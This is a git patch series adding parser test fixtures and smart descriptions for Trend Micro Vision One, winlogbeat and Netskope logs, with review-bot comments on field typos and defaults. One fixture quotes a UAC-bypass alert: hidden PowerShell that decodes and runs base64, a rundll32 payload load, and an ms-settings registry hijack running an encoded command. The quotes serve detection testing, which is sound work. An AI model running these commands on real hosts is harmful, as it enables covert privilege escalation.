@@ -0,0 +1,72 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.12\", \"id\": \"WB-9002-20220906-00022\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://THE_WORKBENCH_URL\", \"alertProvider\": \"SAE\", \"modelId\": \"1ebd4f91-4b28-40b4-87f5-8defee4791d8\", \"model\": \"Privilege Escalation via UAC Bypass\", \"modelType\": \"preset\", \"score\": 64, \"severity\": \"high\", \"firstInvestigatedDateTime\": \"2022-10-06T02:30:31Z\", \"createdDateTime\": \"2022-09-06T02:49:31Z\", \"updatedDateTime\": \"2022-09-06T02:49:48Z\", \"incidentId\": \"IC-1-20230706-00001\", \"caseId\": \"CL-1-20230706-00001\", \"ownerIds\": [\"12345678-1234-1234-1234-123456789012\"], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 1, \"containerCount\": 1, \"cloudIdentityCount\": 1, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"shockwave\\\\sam\", \"entityId\": \"shockwave\\\\sam\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"name\": \"nimda\", \"ips\": [\"10.10.58.51\"]}, \"entityId\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"managementScopeGroupId\": \"deadbeef-292e-42ae-86be-d2fef483a248\", \"managementScopeInstanceId\": \"1babc299-52de-44f4-a1d2-8a224f391eee\", \"managementScopePartitionKey\": \"4c1850c0-8a2a-4637-9f88-6afbab54dd79\", \"relatedEntities\": [\"shockwave\\\\sam\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Alert\"]}, {\"entityType\": \"emailAddress\", \"entityValue\": \"support@pctutordetroit.com\", \"entityId\": \"SUPPORT@PCTUTORDETROIT.COM\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"container\", \"entityValue\": 
\"k8s_democon_longrunl_default_09451f51-7124-4aa5-a5c4-ada24efe9da9_0\", \"entityId\": \"7d1e00176d78b2b1db0744a187314bf2ce39f3a7d43137c366ae6785e8a4f496\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"cloudIdentity\", \"entityValue\": \"arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung\", \"entityId\": \"arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}]}, \"description\": \"A user bypassed User Account Control (UAC) to gain higher-level permissions.\", \"matchedRules\": [{\"id\": \"25d96e5d-cb69-4935-ae27-43cc0cdca1cc\", \"name\": \"(T1088) Bypass UAC via shell open registry\", \"matchedFilters\": [{\"id\": \"ac200e74-8309-463e-ad6b-a4c16a3a377f\", \"name\": \"Bypass UAC Via Shell Open Default Registry\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"mitreTechniqueIds\": [\"T1112\", \"V9.T1112\", \"V9.T1548.002\"], \"matchedEvents\": [{\"uuid\": \"a32599b7-c0c9-45ed-97bf-f2be7679fb00\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"type\": \"TELEMETRY_REGISTRY\"}]}, {\"id\": \"857b6396-da29-44a8-bc11-25298e646795\", \"name\": \"Bypass UAC Via Shell Open Registry\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"mitreTechniqueIds\": [\"T1112\", \"T1088\", \"V9.T1112\", \"V9.T1548.002\"], \"matchedEvents\": [{\"uuid\": \"4c456bbb-2dfc-40a5-b298-799a0ccefc01\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"type\": \"TELEMETRY_REGISTRY\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\rundll32.exe c:\\\\users\\\\sam\\\\appdata\\\\local\\\\cyzfc.dat entrypoint\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": 
\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....XggJHNjQjs=')); iex $r; \", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\rundll32.exe c:\\\\users\\\\sam\\\\appdata\\\\local\\\\cyzfc.dat entrypoint\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....jY0KTtpZXggJHNjQjs=')); iex $r; \", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"registry_key\", \"field\": \"objectRegistryKeyHandle\", \"value\": \"hkcr\\\\ms-settings\\\\shell\\\\open\\\\command\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"registry_key\", \"field\": \"objectRegistryKeyHandle\", \"value\": \"hkcr\\\\ms-settings\\\\shell\\\\open\\\\command\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"registry_value\", \"field\": \"objectRegistryValue\", \"value\": \"delegateexecute\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": 
[\"Alert\"]}, {\"id\": 8, \"type\": \"registry_value_data\", \"field\": \"objectRegistryData\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.12\", \"id\": \"WB-9002-20220906-00022\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://THE_WORKBENCH_URL\", \"alertProvider\": \"SAE\", \"modelId\": \"1ebd4f91-4b28-40b4-87f5-8defee4791d8\", \"model\": \"Privilege Escalation via UAC Bypass\", \"modelType\": \"preset\", \"score\": 64, \"severity\": \"high\", \"firstInvestigatedDateTime\": \"2022-10-06T02:30:31Z\", \"createdDateTime\": \"2022-09-06T02:49:31Z\", \"updatedDateTime\": \"2022-09-06T02:49:48Z\", \"incidentId\": \"IC-1-20230706-00001\", \"caseId\": \"CL-1-20230706-00001\", \"ownerIds\": [\"12345678-1234-1234-1234-123456789012\"], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 1, \"containerCount\": 1, \"cloudIdentityCount\": 1, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"shockwave\\\\sam\", \"entityId\": \"shockwave\\\\sam\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"name\": \"nimda\", \"ips\": [\"10.10.58.51\"]}, \"entityId\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"managementScopeGroupId\": \"deadbeef-292e-42ae-86be-d2fef483a248\", \"managementScopeInstanceId\": \"1babc299-52de-44f4-a1d2-8a224f391eee\", \"managementScopePartitionKey\": 
\"4c1850c0-8a2a-4637-9f88-6afbab54dd79\", \"relatedEntities\": [\"shockwave\\\\sam\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Alert\"]}, {\"entityType\": \"emailAddress\", \"entityValue\": \"support@pctutordetroit.com\", \"entityId\": \"SUPPORT@PCTUTORDETROIT.COM\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"container\", \"entityValue\": \"k8s_democon_longrunl_default_09451f51-7124-4aa5-a5c4-ada24efe9da9_0\", \"entityId\": \"7d1e00176d78b2b1db0744a187314bf2ce39f3a7d43137c366ae6785e8a4f496\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"cloudIdentity\", \"entityValue\": \"arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung\", \"entityId\": \"arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}]}, \"description\": \"A user bypassed User Account Control (UAC) to gain higher-level permissions.\", \"matchedRules\": [{\"id\": \"25d96e5d-cb69-4935-ae27-43cc0cdca1cc\", \"name\": \"(T1088) Bypass UAC via shell open registry\", \"matchedFilters\": [{\"id\": \"ac200e74-8309-463e-ad6b-a4c16a3a377f\", \"name\": \"Bypass UAC Via Shell Open Default Registry\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"mitreTechniqueIds\": [\"T1112\", \"V9.T1112\", \"V9.T1548.002\"], \"matchedEvents\": [{\"uuid\": \"a32599b7-c0c9-45ed-97bf-f2be7679fb00\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"type\": \"TELEMETRY_REGISTRY\"}]}, {\"id\": \"857b6396-da29-44a8-bc11-25298e646795\", \"name\": \"Bypass UAC Via Shell Open Registry\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"mitreTechniqueIds\": [\"T1112\", \"T1088\", \"V9.T1112\", \"V9.T1548.002\"], \"matchedEvents\": [{\"uuid\": \"4c456bbb-2dfc-40a5-b298-799a0ccefc01\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"type\": \"TELEMETRY_REGISTRY\"}]}]}], 
\"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\rundll32.exe c:\\\\users\\\\sam\\\\appdata\\\\local\\\\cyzfc.dat entrypoint\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....XggJHNjQjs=')); iex $r; \", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\rundll32.exe c:\\\\users\\\\sam\\\\appdata\\\\local\\\\cyzfc.dat entrypoint\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....jY0KTtpZXggJHNjQjs=')); iex $r; \", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"registry_key\", \"field\": \"objectRegistryKeyHandle\", \"value\": \"hkcr\\\\ms-settings\\\\shell\\\\open\\\\command\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"registry_key\", \"field\": \"objectRegistryKeyHandle\", \"value\": 
\"hkcr\\\\ms-settings\\\\shell\\\\open\\\\command\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"registry_value\", \"field\": \"objectRegistryValue\", \"value\": \"delegateexecute\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"registry_value_data\", \"field\": \"objectRegistryData\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "type": [ + "info" + ] + }, + "@timestamp": "2022-09-06T02:49:31Z", + "container": { + "id": "7d1e00176d78b2b1db0744a187314bf2ce39f3a7d43137c366ae6785e8a4f496", + "name": "k8s_democon_longrunl_default_09451f51-7124-4aa5-a5c4-ada24efe9da9_0" + }, + "host": { + "ip": [ + "10.10.58.51" + ], + "name": "nimda" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "organization": { + "id": "shockwave\\sam", + "name": "shockwave\\sam" + }, + "process": { + "command_line": "c:\\windows\\system32\\rundll32.exe c:\\users\\sam\\appdata\\local\\cyzfc.dat entrypoint", + "parent": { + "command_line": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....XggJHNjQjs=')); iex $r; " + } + }, + "registry": { + "data": { + "strings": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows 
Update).Update); powershell -NoP -NonI -W Hidden -enc $x" + }, + "hive": "hkcr", + "key": "ms-settings\\shell\\open\\command", + "path": "hkcr\\ms-settings\\shell\\open\\command\\hkcr\\ms-settings\\shell\\open\\command\\delegateexecute", + "value": "delegateexecute" + }, + "related": { + "ip": [ + "10.10.58.51" + ] + }, + "rule": { + "name": "Privilege Escalation via UAC Bypass" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-9002-20220906-00022", + "case_id": "CL-1-20230706-00001", + "incident_id": "IC-1-20230706-00001", + "investigation_status": "New", + "severity": "high", + "status": "Open" + } + }, + "user": { + "email": "support@pctutordetroit.com" + } + } +} \ No newline at end of file From f316fac6627ec461e64f6d3fa367286cf088a1ad Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Tue, 19 Nov 2024 09:52:34 +0200 Subject: [PATCH 36/84] Add smart descriptions --- .../trend-micro-vision-one/_meta/smart-descriptions.json | 6 ++++++ Trend Micro/trend-micro-vision-one/ingest/parser.yml | 2 ++ Trend Micro/trend-micro-vision-one/tests/test_process.json | 1 + Trend Micro/trend-micro-vision-one/tests/test_registry.json | 1 + 4 files changed, 10 insertions(+) diff --git a/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json b/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json index e69de29bb..7a3ee9d51 100644 --- a/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json +++ b/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json @@ -0,0 +1,6 @@ +[ + { + "value": "{event.reason}", + "conditions": [{ "field": "event.reason" }] + } +] diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml index 38a31dd29..be400399d 100644 --- a/Trend Micro/trend-micro-vision-one/ingest/parser.yml +++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml 
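Review bot: The expected `registry.path` in this fixture repeats the key before the value name: `hkcr\\ms-settings\\shell\\open\\command\\hkcr\\ms-settings\\shell\\open\\command\\delegateexecute`, which looks like the parser concatenates both `registry_key` indicators (ids 5 and 6 carry the same value) rather than building `hive\key\value` once; the fixture therefore pins a malformed path instead of `hkcr\\ms-settings\\shell\\open\\command\\delegateexecute`. The parser that produces this is not in the diff, so the de-duplication presumably belongs there, with this expected value corrected alongside it. Separately, the `account` entity `shockwave\\sam` is mapped to `organization.id`/`organization.name` here and in test_process.json; if that entity is a user account rather than a tenant, `user.name`/`user.domain` would be the ECS fields a detection rule expects — worth confirming against the parser before these fixtures lock the mapping in.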
@@ -20,6 +20,8 @@ stages: observer.vendor: "TrendMicro" observer.product: "Vision One" + event.reason: "{{parsed_event.message.model}}" + - set: "@timestamp": "{{parsed_event.message.createdDateTime}}" diff --git a/Trend Micro/trend-micro-vision-one/tests/test_process.json b/Trend Micro/trend-micro-vision-one/tests/test_process.json index 5eca6b2ea..d6ef4acd1 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_process.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_process.json @@ -9,6 +9,7 @@ "intrusion_detection" ], "kind": "alert", + "reason": "Credential Dumping via Mimikatz", "type": [ "info" ] diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one/tests/test_registry.json index 093876a30..f9873edf1 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_registry.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_registry.json @@ -9,6 +9,7 @@ "intrusion_detection" ], "kind": "alert", + "reason": "Privilege Escalation via UAC Bypass", "type": [ "info" ] From 4b2aab06f6f6c739acc1bc9f1557ccc496ed6edc Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Tue, 19 Nov 2024 09:54:57 +0200 Subject: [PATCH 37/84] Add automation UUIDs --- Trend Micro/trend-micro-vision-one/_meta/manifest.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/Trend Micro/trend-micro-vision-one/_meta/manifest.yml b/Trend Micro/trend-micro-vision-one/_meta/manifest.yml index c0121a28d..8363b7b96 100644 --- a/Trend Micro/trend-micro-vision-one/_meta/manifest.yml +++ b/Trend Micro/trend-micro-vision-one/_meta/manifest.yml @@ -1,4 +1,6 @@ uuid: 9844ea0a-de7f-45d4-9a9b-b07651f0630e +automation_connector_uuid: 7aa5dd7c-d694-44dd-b605-66b7974dfb05 +automation_module_uuid: 1b02d442-b804-4987-afe7-6a4be6ef35e6 name: Trend Micro Vision One slug: trend-micro-vision-one From fbbe4c415d5ff8c2fd61103b32f54b68711e66a7 Mon Sep 17 00:00:00 2001 
From: LenaigKaliou Date: Tue, 19 Nov 2024 09:44:23 +0100 Subject: [PATCH 38/84] small fixes on conditions --- .../winlogbeat/_meta/smart-descriptions.json | 108 +++++++++++++++++- 1 file changed, 105 insertions(+), 3 deletions(-) diff --git a/Beats/winlogbeat/_meta/smart-descriptions.json b/Beats/winlogbeat/_meta/smart-descriptions.json index b720b4ffb..d3979925e 100644 --- a/Beats/winlogbeat/_meta/smart-descriptions.json +++ b/Beats/winlogbeat/_meta/smart-descriptions.json @@ -205,6 +205,35 @@ } ] }, + { + "value": "{action.properties.SubjectDomainName}\\{action.properties.SubjectUserName} logged on to {host.name} with special privileges", + "relationships": [ + { + "source": "user.name", + "target": "host.name", + "type": "logged on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4672 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.SubjectDomainName" + }, + { + "field": "action.properties.SubjectuserName" + }, + { + "field": "host.name" + } + ] + }, { "value": "{user.domain}\\{user.name} logged on to {host.name} with special privileges", "relationships": [ @@ -222,6 +251,15 @@ { "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "user.domain" + }, + { + "field": "user.name" + }, + { + "field": "host.name" } ] }, @@ -726,7 +764,7 @@ "value": "Microsoft-Windows-Security-Auditing" }, { - "field":"host.hostname" + "field": "host.hostname" } ] }, @@ -802,7 +840,7 @@ "value": "Microsoft-Windows-Security-Auditing" }, { - "field":"host.hostname" + "field": "host.hostname" } ] }, @@ -853,7 +891,7 @@ "field": "source.ip" }, { - "field":"host.hostname" + "field": "host.hostname" } ] }, 
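Review bot: In the new 4672 entry (hunk `@@ -205,6 +205,35 @@`) the condition `"field": "action.properties.SubjectuserName"` has a lowercase `u`, while the description template reads `{action.properties.SubjectUserName}`; if field names are matched case-sensitively this condition never holds and the description is never rendered, so it should be `"field": "action.properties.SubjectUserName"`. The relationship in the same entry uses `user.name` as its source even though the template is built from `action.properties.*`, which is inconsistent with the neighbouring entry that derives both from `user.domain`/`user.name`; presumably one of the two field families is populated for this event and the entry should use it consistently. A comment on the entry such as `"_comment": "fallback when user.* is not populated for 4672"` would make the intent clear to the next maintainer, if the schema tolerates extra keys.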
@@ -1068,6 +1106,58 @@ } ] }, + { + "value": "{host.hostname} allowed a connection from {action.properties.SourceAddress}:{action.properties.SourcePort}", + "relationships": [ + { + "source": "action.properties.SourceAddress", + "target": "action.properties.DestAddress", + "type": "connected to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5156 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.SourceAddress" + }, + { + "field": "action.properties.SourcePort" + } + ] + }, + { + "value": "{host.hostname} allowed a connection to {action.properties.DestAdress}:{action.properties.DestPort}", + "relationships": [ + { + "source": "action.properties.SourceAddress", + "target": "action.properties.DestAddress", + "type": "connected to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5156 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.DestAddress" + }, + { + "field": "action.properties.DestPort" + } + ] + }, { "value": "{host.hostname} allowed a connection from {action.properties.SourceAddress}:{action.properties.SourcePort} to {action.properties.DestAdress}:{action.properties.DestPort}", "relationships": [ @@ -1085,6 +1175,18 @@ { "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.SourceAddress" + }, + { + "field": "action.properties.DestAddress" + }, + { + "field": "action.properties.SourcePort" + }, + { + "field": "action.properties.DestPort" } ] }, From 2207f3078290450fbbbcfe9b4584bf68d7a3fb49 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Tue, 19 Nov 2024 09:47:15 +0100 Subject: [PATCH 39/84] fixing typo --- Beats/winlogbeat/_meta/smart-descriptions.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) 
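Review bot: Both new 5156 entries (hunk `@@ -1068,6 +1106,58 @@`) render `{host.hostname}` in their value but do not list `host.hostname` among their conditions, unlike the existing entries in this file (e.g. the ones at `@@ -726,7 +764,7 @@` and `@@ -853,7 +891,7 @@`) which guard on it; without that guard the description can render with an empty host. Adding `{ "field": "host.hostname" }` to each entry's conditions keeps the file consistent. The first entry's relationship also targets `action.properties.DestAddress` while only `SourceAddress`/`SourcePort` are required, so the relationship may reference an absent field; either require `DestAddress` too or drop the relationship from the source-only entry.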
diff --git a/Beats/winlogbeat/_meta/smart-descriptions.json b/Beats/winlogbeat/_meta/smart-descriptions.json index d3979925e..1d8547db9 100644 --- a/Beats/winlogbeat/_meta/smart-descriptions.json +++ b/Beats/winlogbeat/_meta/smart-descriptions.json @@ -1133,7 +1133,7 @@ ] }, { - "value": "{host.hostname} allowed a connection to {action.properties.DestAdress}:{action.properties.DestPort}", + "value": "{host.hostname} allowed a connection to {action.properties.DestAddress}:{action.properties.DestPort}", "relationships": [ { "source": "action.properties.SourceAddress", @@ -1159,7 +1159,7 @@ ] }, { - "value": "{host.hostname} allowed a connection from {action.properties.SourceAddress}:{action.properties.SourcePort} to {action.properties.DestAdress}:{action.properties.DestPort}", + "value": "{host.hostname} allowed a connection from {action.properties.SourceAddress}:{action.properties.SourcePort} to {action.properties.DestAddress}:{action.properties.DestPort}", "relationships": [ { "source": "action.properties.SourceAddress", From 6abd31bb9209f77aab598e290a7c8370a98a67ff Mon Sep 17 00:00:00 2001 
From: LenaigKaliou Date: Tue, 19 Nov 2024 10:55:07 +0100 Subject: [PATCH 40/84] Fixes on Netskope format --- Netskope/netskope_events/ingest/parser.yml | 5 +- .../test_audit_log_deleted_inline_policy.json | 1 + .../test_audit_log_edit_admin_record.json | 1 + .../tests/test_audit_log_login_failed.json | 1 + .../test_audit_log_login_successful.json | 1 + .../test_audit_log_logout_successful.json | 1 + ..._audit_log_password_change_successful.json | 1 + .../tests/test_connection_log.json | 1 + .../tests/test_dlp_incident.json | 3 +- .../tests/test_malware_alert.json | 5 +- .../tests/test_nspolicy_block.json | 109 ++++++++++++++++ .../tests/test_nspolicy_log.json | 3 +- .../tests/test_nspolicy_upload.json | 120 ++++++++++++++++++ .../tests/test_user_alert.json | 2 +- 14 files changed, 248 insertions(+), 6 deletions(-) create mode 100644 Netskope/netskope_events/tests/test_nspolicy_block.json create mode 100644 Netskope/netskope_events/tests/test_nspolicy_upload.json diff --git a/Netskope/netskope_events/ingest/parser.yml b/Netskope/netskope_events/ingest/parser.yml index 1c33c07bc..7ce3a2543 100644 --- a/Netskope/netskope_events/ingest/parser.yml +++ b/Netskope/netskope_events/ingest/parser.yml @@ -36,7 +36,7 @@ stages: "@timestamp": "{{parse_date.datetime}}" observer.vendor: "Netskope" event.dataset: "{{parsed_event.message.type}}" - event.action: "{{parsed_event.message.activity}}" + event.action: "{{parsed_event.message.action or parsed_event.message.activity or 'Allow'}}" event.reason: "{{parsed_event.message.audit_log_event or parsed_event.message.bypass_reason}}" event.duration: "{{parsed_event.message.conn_duration}}" user_agent.original: "{{parsed_event.message.user_agent}}" 
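Review bot: The `or 'Allow'` fallback in hunk `@@ -36,7 +36,7 @@` stamps `event.action: Allow` on every record that carries neither `action` nor `activity`, which includes the admin audit logs and connection logs; the fixtures in this same commit now expect `"action": "Allow"` on a `Login Failed` audit event (test_audit_log_login_failed.json), so a detection rule keyed on `event.action` would read a failed login as allowed. A default only makes sense for event types where Netskope omits the field to mean the traffic was permitted, so the fallback should be gated on `parsed_event.message.type` rather than applied globally. One way that stays within the syntax already used in this file, if the filter expression supports `not`: keep `event.action: "{{parsed_event.message.action or parsed_event.message.activity}}"` in the existing `set`, and add `- set:` / `event.action: "Allow"` / `filter: "{{parsed_event.message.type != 'admin_audit_logs' and not parsed_event.message.action and not parsed_event.message.activity}}"`, then update the audit-log fixtures to expect no `event.action`. The exact set of types for which an absent action means "allowed" is not visible here and should be confirmed against the vendor schema.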
@@ -92,6 +92,9 @@ stages: - set: file.path: "{{parsed_event.message.file_path}}" filter: '{{parsed_event.message.file_path not in [None, "", "NA"]}}' + - set: + file.size: "{{parsed_event.message.file_size}}" + filter: "{{parsed_event.message.file_size not in [None, 0]}}" - translate: dictionary: "yes": "alert" diff --git a/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json b/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json index 67944d71d..df70ea26e 100644 --- a/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json +++ b/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json @@ -5,6 +5,7 @@ "expected": { "message": "{\n \"timestamp\": 1651451341,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 2,\n \"audit_log_event\": \"Deleted inline policy\",\n \"supporting_data\": {\n \"data_type\": \"policy\",\n \"data_values\": [\n false\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": 